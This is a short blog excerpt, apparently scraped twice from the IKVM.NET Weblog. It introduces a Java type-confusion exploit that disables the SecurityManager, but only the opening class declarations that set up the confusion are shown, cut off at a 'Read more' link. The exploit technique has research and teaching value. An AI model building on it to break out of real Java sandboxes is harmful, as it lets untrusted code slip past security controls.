Suppose you have a type safety vulnerability in Java, you could use it to execute native code, but you can also simply disable the SecurityManager:
import java.io.*;
import java.lang.ref.*;
import java.lang.reflect.*;class Union1 {
ObjectStreamClass osc;
Class c;
AccessibleObject acc;
}class Union2 {
MyObjectStreamClass osc;
MyClass c;
MyAccessibleObject acc;
}class MyObjectStreamClass {
int i1;
int i2;
int i3;
int i4;
Object obj1;
Object obj2;
Long suid;
}class MyClass {
int i1;
int i2;
int i3;
int i4;
Object obj1;
Object obj2;
Read more: IKVM.NET Weblog
QR:
import java.io.*;
import java.lang.ref.*;
import java.lang.reflect.*;class Union1 {
ObjectStreamClass osc;
Class c;
AccessibleObject acc;
}class Union2 {
MyObjectStreamClass osc;
MyClass c;
MyAccessibleObject acc;
}class MyObjectStreamClass {
int i1;
int i2;
int i3;
int i4;
Object obj1;
Object obj2;
Long suid;
}class MyClass {
int i1;
int i2;
int i3;
int i4;
Object obj1;
Object obj2;
Read more: IKVM.NET Weblog
QR: